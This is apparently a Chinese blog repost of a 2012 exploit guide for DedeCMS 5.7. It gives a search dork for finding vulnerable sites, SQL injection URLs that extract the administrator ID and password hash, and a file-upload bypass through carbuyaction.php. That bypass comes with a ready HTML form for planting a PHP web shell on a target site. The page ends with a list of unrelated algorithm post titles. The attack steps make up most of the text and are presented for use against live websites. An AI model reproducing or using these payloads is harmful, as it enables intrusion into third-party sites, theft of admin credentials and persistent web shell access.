• dedecms5.7最新注入和上传漏洞


    转自:http://www.sa666.com/thread-25247-1-1.html

    发布时间:2012-4.26
    发布作者:佚名

    漏洞类型:注入漏洞、上传漏洞

    漏洞描述:百度搜索关键字“Powered by DedeCMSV57_GBK 2004-2011 DesDev Inc”,获得使用DeDeCMS系统的网站。

      注入漏洞。首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,

      然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。

      然后写上语句/member/ajax_membergroup.php?action=post&membergroup=@`'` Union select userid from `%23@__admin` where 1 or id=@`'` 查看管理员id

      /member/ajax_membergroup.php?action=post&membergroup=@`'` Union select pwd from `%23@__admin` where 1 or id=@`'` 查看管理员密码

      得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5

      上传漏洞。要求网站开启新会员注册功能,首先注册新会员,无需通过邮件验证,

      只要登陆会员中心,然后访问页面链接

      “/plus/carbuyaction.php?dopost=memclickout&oid =S-P0RN8888&rs[code]=../dialog/select_soft_post”

      如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”

     于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm

    <form action="http://www.xxx.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="from1">
    file:<input name="uploadfile" type="file" /><br>
    newname:<input name="newname" type="text" value="a.Php" />
    <button class="button2" type="submit">提交</button><br><br>

    把url改成目标url就行了。还有个全局变量提交,绕过注册的可以去黑防2月刊上面看。

  • 相关阅读:
    hdu5754_找规律+威佐夫博弈
    codeforce645C_尺取法
    hdu4336_容斥dp
    poj3071_概率dp
    codeforces148D_推论题
    poj2151_概率dp
    hdu3853_概率dp
    POJ 1410 判断线段与矩形交点或在矩形内
    POJ 1066 Treasure Hunt 线段相交判断
    POJ 2653 Pick-up sticks 判断线段相交
  • 原文地址:https://www.cnblogs.com/shanmao/p/2876906.html
Copyright © 2020-2023  润新知